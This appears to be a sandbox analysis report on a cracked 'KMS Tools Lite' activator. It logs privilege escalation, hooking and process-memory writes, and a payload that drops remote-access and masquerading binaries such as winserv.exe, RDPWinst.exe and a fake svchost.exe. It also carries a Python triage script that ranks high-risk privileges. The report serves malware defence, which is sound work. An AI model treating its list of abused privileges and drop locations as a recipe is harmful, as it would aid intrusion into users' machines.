N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\Windows\SysWOW64\unsecapp.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\RDPWinst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
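Two of the token rows above show a bare number instead of a name ("Token: 35" and "Token: 33"); the sandbox reports the privilege LUID where it could not resolve it. These are the documented well-known privilege LUIDs from the Windows SDK: 35 is SeCreateSymbolicLinkPrivilege and 33 is SeIncreaseWorkingSetPrivilege, both unremarkable for an archiver and the audio service respectively. What matters in this table is winserv.exe, a binary in C:\ProgramData, enabling SeDebugPrivilege, SeTakeOwnershipPrivilege and SeTcbPrivilege, the set a remote-administration service needs to inject into other processes, take over protected files and create tokens for any session. The Python below is an added example, not part of the report: it resolves LUIDs, groups the rows by process and ranks processes by the high-risk privileges they enabled. The rows are copied from the table; the LUID table is the SDK numbering; which privileges count as high-risk is this example's own list.

```python
from collections import defaultdict

# Well-known privilege LUIDs (low part) as numbered in the Windows SDK.
LUID_NAMES = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege",
    4: "SeLockMemoryPrivilege", 5: "SeIncreaseQuotaPrivilege",
    6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege",
    10: "SeLoadDriverPrivilege", 11: "SeSystemProfilePrivilege",
    12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege",
    16: "SeCreatePermanentPrivilege", 17: "SeBackupPrivilege",
    18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege",
    22: "SeSystemEnvironmentPrivilege", 23: "SeChangeNotifyPrivilege",
    24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege",
    28: "SeManageVolumePrivilege", 29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege", 35: "SeCreateSymbolicLinkPrivilege",
    36: "SeDelegateSessionUserImpersonatePrivilege",
}

# Privileges whose enablement by a non-Windows binary warrants attention.
# Selection is this example's own.
HIGH_RISK = {
    "SeDebugPrivilege": "open and inject into any process",
    "SeTcbPrivilege": "act as part of the OS; create tokens for any session",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and keys",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeRestorePrivilege": "write files regardless of their ACLs",
    "SeBackupPrivilege": "read files regardless of their ACLs",
    "SeImpersonatePrivilege": "impersonate connecting clients",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a process",
}


def resolve(token_column: str) -> str:
    """Map 'Token: SeDebugPrivilege' or 'Token: 35' to a privilege name."""
    value = token_column.split(":", 1)[1].strip()
    if value.isdigit():
        return LUID_NAMES.get(int(value), f"LUID {value} (unknown)")
    return value


def privileges_by_process(rows):
    """rows: (token_column, process_path). Returns {process: set(names)}."""
    out = defaultdict(set)
    for token, process in rows:
        out[process].add(resolve(token))
    return dict(out)


def rank(rows):
    """[(process, sorted high-risk privileges)], most privileges first."""
    scored = []
    for proc, privs in privileges_by_process(rows).items():
        risky = sorted(p for p in privs if p in HIGH_RISK)
        if risky:
            scored.append((proc, risky))
    scored.sort(key=lambda item: (-len(item[1]), item[0]))
    return scored


SEVENZIP = r"C:\Program Files\7-Zip\7zFM.exe"
AUDIODG = r"C:\Windows\system32\AUDIODG.EXE"
SEVENZ_TMP = r"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINSERV = r"C:\ProgramData\Windows Tasks Service\winserv.exe"
RDPWINST = r"C:\ProgramData\RDPWinst.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# The AdjustPrivilegeToken rows from the table above, in order.
ROWS = [
    ("Token: SeRestorePrivilege", SEVENZIP), ("Token: 35", SEVENZIP),
    ("Token: SeSecurityPrivilege", SEVENZIP), ("Token: SeSecurityPrivilege", SEVENZIP),
    ("Token: 33", AUDIODG), ("Token: SeIncBasePriorityPrivilege", AUDIODG),
    ("Token: SeRestorePrivilege", SEVENZ_TMP), ("Token: 35", SEVENZ_TMP),
    ("Token: SeSecurityPrivilege", SEVENZ_TMP), ("Token: SeSecurityPrivilege", SEVENZ_TMP),
    ("Token: SeRestorePrivilege", SEVENZ_TMP), ("Token: 35", SEVENZ_TMP),
    ("Token: SeSecurityPrivilege", SEVENZ_TMP), ("Token: SeSecurityPrivilege", SEVENZ_TMP),
    ("Token: SeDebugPrivilege", POWERSHELL),
    ("Token: SeDebugPrivilege", WINSERV), ("Token: SeTakeOwnershipPrivilege", WINSERV),
    ("Token: SeTcbPrivilege", WINSERV), ("Token: SeTcbPrivilege", WINSERV),
    ("Token: SeDebugPrivilege", RDPWINST),
    ("Token: SeAuditPrivilege", SVCHOST),
]

if __name__ == "__main__":
    for proc, risky in rank(ROWS):
        print(proc)
        for name in risky:
            print("   ", name, "-", HIGH_RISK[name])
```

winserv.exe comes out on top with three high-risk privileges. 7-Zip (7zFM.exe and the extracted 7zaxxx.exe) appears only because of SeRestorePrivilege, which an archiver enables to restore file security on extraction, and svchost.exe with SeAuditPrivilege is ordinary service behaviour; the ranking is a prioritisation aid, and the process path (see the masquerading check earlier on this page) decides whether a hit is worth pursuing.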

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\GSetup.exe N/A
N/A N/A C:\ProgramData\Setup\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
N/A N/A C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe N/A
N/A N/A C:\ProgramData\Setup\KMS.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
N/A N/A C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\win.exe N/A
N/A N/A C:\ProgramData\Setup\svchost.exe N/A
N/A N/A C:\ProgramData\Setup\IP.exe N/A
N/A N/A C:\ProgramData\Setup\smss.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\RDPWinst.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A
N/A N/A C:\ProgramData\Windows Tasks Service\winserv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1188 wrote to memory of 5596 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5596 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 5152 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1188 wrote to memory of 1676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (50 consecutive identical entries)
PID 1188 wrote to memory of 4272 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (9 consecutive identical entries)

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://kms-auto.site/windows-10-activator/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x300,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1928,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2272,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2408,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3476,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5092,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5072,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5788,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5812 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=5224,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=4812,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5880,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6584,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5964,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6316,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

